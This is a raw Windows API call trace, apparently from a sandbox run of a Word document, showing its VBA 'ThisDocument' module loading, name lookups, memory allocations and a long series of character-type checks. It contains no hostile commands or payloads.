CoCreateGuid (in: pguid=0x33e4fb3e90 | out: pguid=0x33e4fb3e90*(Data1=0x2fabf9a2, Data2=0xbd8, Data3=0x4dd6, Data4=([0]=0xa4, [1]=0x71, [2]=0xfa, [3]=0x36, [4]=0xef, [5]=0x64, [6]=0xeb, [7]=0x19))) returned 0x0 [0058.954] WideCharToMultiByte (in: CodePage=0x3b5, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb3ea0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0058.954] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.954] GetLocalTime (in: lpSystemTime=0x33e4fb3d78 | out: lpSystemTime=0x33e4fb3d78*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0xf7)) [0058.954] _ultow_s (in: _Value=0x61d40718, _Buffer=0x1d39da0dc2c, _BufferCount=0x9, _Radix=16 | out: _Buffer="61d40718") returned 0x0 [0058.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0161d40718", cchWideChar=11, lpMultiByteStr=0x33e4fb3d10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0161d40718", lpUsedDefaultChar=0x0) returned 11 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x170) returned 0x1d39d8e2ea0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x50) returned 0x1d39d76a900 [0058.955] strcpy_s (in: _Dst=0x1d3984c9bf8, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0058.955] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a8390, cb=0x68) returned 0x1d39d84f220 [0058.955] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.955] wcscpy_s (in: _Destination=0x1d39da0dc40, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0058.955] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.955] wcscpy_s (in: _Destination=0x1d39da0dc60, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0058.955] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a80e0, cb=0x12) returned 0x1d39d86d1e0 [0058.955] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a8320, cb=0x6) returned 0x1d39d4a80e0 [0058.955] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x48) returned 0x1d39d7b5aa0 [0058.955] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d84e960) [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398212f40 [0058.955] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d398212f40, cb=0x74) returned 0x1d39d995d00 [0058.955] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7b5aa0) [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3d0) returned 0x1d39d97e5e0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398212f40 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39d86eb60 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83bfb0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a82a0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8320 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x688) returned 0x1d39da40d10 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83cb80 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x640) returned 0x1d39d9cb2c0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398212fa0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8390 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8cd0 [0058.955] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398213000 [0058.956] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83d1b0 [0058.956] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x400) returned 0x1d3986a3a90 [0058.956] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x400) returned 0x1d3986a7780 [0058.956] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x400) returned 0x1d3986a09d0 [0058.956] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_Evaluate") returned 0x50d918 [0058.956] strcpy_s (in: _Dst=0x33e4fb3ee0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb3ee0, cbMultiByte=10, lpWideCharStr=0x33e4fb3d30, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0058.956] IUnknown:AddRef (This=0x1d3980663b0) returned 0x3 [0058.956] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb3e00, pBstrLibName=0x33e4fb3d30 | out: pfName=0x33e4fb3e00*=0, pBstrLibName=0x33e4fb3d30) returned 0x0 [0058.956] IUnknown:Release (This=0x1d3980663b0) returned 0x2 [0058.956] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x4 [0058.956] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb3e00, pBstrLibName=0x33e4fb3d30 | out: pfName=0x33e4fb3e00*=0, pBstrLibName=0x33e4fb3d30) returned 0x0 [0058.956] IUnknown:Release (This=0x1d3985c4c00) returned 0x3 [0058.956] IUnknown:AddRef (This=0x1d3980655f0) returned 0x5 [0058.956] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb3e00, pBstrLibName=0x33e4fb3d30 | out: pfName=0x33e4fb3e00*=0, pBstrLibName=0x33e4fb3d30) returned 0x0 [0058.956] IUnknown:Release (This=0x1d3980655f0) returned 0x4 [0058.956] IUnknown:AddRef (This=0x1d3985c5700) returned 0x2 [0058.956] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb3e00, pBstrLibName=0x33e4fb3d30 | out: pfName=0x33e4fb3e00*=1, pBstrLibName=0x33e4fb3d30) returned 0x0 [0058.956] IUnknown:Release (This=0x1d3985c5700) returned 0x1 [0058.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x33e4fb3ee0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0058.956] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_Evaluate") returned 0x50d918 [0058.956] wcsncpy_s (in: _Destination=0x33e4fb3ef0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.956] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb3e20, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.956] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0058.957] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2028) returned 0x1d39d8e4ce0 [0058.957] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10020) returned 0x1d39d8e6d10 [0058.957] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2ee0) returned 0x1d39d8f6d40 [0058.957] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x800) returned 0x1d39862ff10 [0058.957] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x404) returned 0x1d3986a1600 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="…", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.957] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9f", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr=" ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¡", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¢", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="£", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¤", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¥", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¦", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="§", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¨", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="©", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ª", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="«", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¬", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="­", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="®", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¯", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="°", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="±", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="²", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="³", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="´", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="µ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¶", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="·", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.958] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¸", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¹", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="º", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="»", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¼", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="½", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¾", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="¿", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="À", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Á", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Â", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ã", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ä", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Å", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Æ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ç", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="È", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="É", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ê", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ë", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ì", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Í", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Î", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ï", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ð", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ñ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ò", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ó", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ô", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Õ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ö", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="×", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ø", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ù", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ú", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Û", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ü", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.959] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ý", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Þ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ß", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="à", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="á", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="â", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ã", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ä", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="å", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="æ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 